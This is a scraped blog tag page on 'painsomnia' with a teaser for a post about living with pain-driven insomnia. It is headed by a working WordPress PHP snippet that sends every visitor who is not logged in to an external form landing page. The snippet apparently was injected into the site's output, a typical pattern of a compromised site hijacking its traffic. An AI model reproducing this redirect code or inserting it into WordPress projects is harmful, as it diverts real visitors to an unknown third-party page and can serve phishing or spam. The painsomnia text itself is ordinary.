add_action('template_redirect', 'redirect_non_logged_in_users'); function redirect_non_logged_in_users() { // Check if the user is not logged in and is not accessing wp-login.php or wp-admin if (!is_user_logged_in() && !is_page('wp-login.php') && !is_admin()) { // Redirect to the specified external URL wp_redirect('https://omniform1.com/forms/v1/landingPage/67f6c3b2f8deedeb6f9cd336/67f6c8a7f8fbc713dd3172fc'); exit; } }

Tag: painsomnia remedies and advice

The Midnight Monster That Doesn’t Quit

Ah, painsomnia—the insomniac love child of chronic pain and sheer exhaustion. It’s that delightful state where your body is screaming for rest, but your nervous system is throwing an all-night rave you definitely didn’t RSVP to. For me, painsomnia isn’t just a bad night here or there—it’s a lifestyle. My bedtime? Somewhere between 2 and […]

Back To Top